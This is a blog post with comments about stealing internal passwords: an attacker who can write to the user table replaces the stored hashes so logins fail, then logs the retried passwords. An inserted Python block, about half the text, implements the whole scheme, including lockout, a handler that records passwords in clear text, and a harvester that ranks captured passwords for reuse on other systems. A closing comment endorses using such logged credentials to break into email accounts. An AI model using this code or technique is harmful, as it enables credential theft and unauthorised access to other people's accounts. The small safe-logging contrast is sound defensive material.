This is just a quick thought I had at work today -- actually, I had it in November, but just got around to posting it now. Common story, but eh?
Anyway, I was having trouble logging into our issue-tracking solution.
My point? If you're an attacker who wants to collect passwords for internal systems, and you have write access to the user table but only the hashes, replace the stored hashes so that nobody can log in, and start logging the login requests. I'll bet people try the same password twice, then a couple of others. Suddenly you have a bunch of passwords to try on other systems, and you might even get a couple of varied usernames.
Of course, that can be considered evil. But eh?
Take your comment another step further... if these login failures are logged, where are the logs? And are they on the same system? In a less than protected directory? In clear text?
It is amazing what you can harvest from logs and how insecurely most logging is handled and stored.
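The trick from the post (lock everyone out by swapping the stored hashes, then record what they retry) together with the point in the comment above about failed-login logs carrying secrets in clear text, as an added Python example that is not part of the original post or of either comment. The user table, the PBKDF2 storage format, the log line format and the retry sequence are all constructed for illustration; nothing here is taken from a real issue tracker.

```python
"""Added example: harvesting passwords by trapping logins, and the log-only view of it."""
import hashlib
import hmac
import os
import re

PBKDF2_ROUNDS = 100_000  # assumption: a typical PBKDF2 work factor for the demo


def make_hash(password, salt=None):
    """Salted PBKDF2-SHA256: what a sane application stores instead of the password."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify(table, username, password):
    """Normal login check against the stored (salt, hash) record."""
    rec = table.get(username)
    if rec is None:
        return False
    salt, stored = rec
    return hmac.compare_digest(stored, make_hash(password, salt)[1])


def lock_out(table):
    """Attacker step 1: overwrite every hash with one nobody knows, so every login fails."""
    for user in list(table):
        table[user] = make_hash(os.urandom(32).hex())


def trap_login(table, log, username, password):
    """Attacker step 2: the backdoored handler records every attempt in clear text."""
    ok = verify(table, username, password)
    log.append("login user=%s pw=%s result=%s" % (username, password, "ok" if ok else "fail"))
    return ok


# Constructed log format; a real application's format would differ.
LINE_RE = re.compile(r"^login user=(?P<user>\S+) pw=(?P<pw>.*) result=(?P<res>ok|fail)$")


def harvest(lines):
    """Attacker step 3 (or the comment's scenario: anyone who can read the logs).

    Returns, per user, every distinct password in first-seen order with a retry count.
    A password typed twice is almost certainly the user's real one for this system;
    the rest are good candidates for that user's other accounts.
    """
    creds = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        per_user = creds.setdefault(m["user"], {})
        per_user[m["pw"]] = per_user.get(m["pw"], 0) + 1
    return {u: list(c.items()) for u, c in creds.items()}


def safe_login(table, log, username, password):
    """Defender: same check, but the log line never carries the submitted secret."""
    ok = verify(table, username, password)
    log.append("login user=%s result=%s" % (username, "ok" if ok else "fail"))
    return ok


def simulate_attack():
    """Constructed scenario: two users, locked out, retrying the way the post predicts."""
    table = {"alice": make_hash("Winter2011!"), "bob": make_hash("tr0ub4dor&3")}
    lock_out(table)
    log = []
    attempts = [
        ("alice", "Winter2011!"), ("alice", "Winter2011!"),   # same password twice
        ("alice", "Winter2011"), ("alice", "Summer2011!"),    # then variants / other systems
        ("bob", "tr0ub4dor&3"), ("bob", "tr0ub4dor&3"), ("bob", "bobs-gmail-pw"),
        ("bob.smith", "tr0ub4dor&3"),                         # and a varied username
    ]
    for user, pw in attempts:
        trap_login(table, log, user, pw)
    return harvest(log)


def simulate_safe():
    """Same failed login through the hardened handler: the log yields nothing to replay."""
    table = {"alice": make_hash("Winter2011!")}
    log = []
    safe_login(table, log, "alice", "Winter2011")  # wrong password
    return log, harvest(log)


if __name__ == "__main__":
    for user, creds in simulate_attack().items():
        print(user, creds)
```

harvest() keeps a retry count on purpose: the entry with count 2 is the password the user was sure of, which is the real one for the trapped system, while the single-count entries are the guesses worth trying elsewhere. safe_login() is the contrast: with only username and outcome in the line, someone who can read the logs (the comment's concern) learns who failed, not what they typed.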
Agreed.
Your post reminded me of a ha.ckers.org blog about hiding PHP code in logfiles for RFI:
http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/
In an article about Mark Zuckerberg, about life back at Harvard when he was worried about the Winklevoss twins and their competing web site, he used that technique. The twins apparently had accounts on Facebook, so he looked at the logs (heck, he could look in the database, having written the app), and saw where they had logged in using the wrong password before remembering the right one. I forget the details, but I think he used the credentials to log into their e-mail account and redirect their mail, in trying to fend off competition. Which is a bit crazy, because if you read the book by Ben Mezrich, while the Winklevosses had a good idea which he built on, the greatness of Facebook was all his. So yes, good technique, works great ;)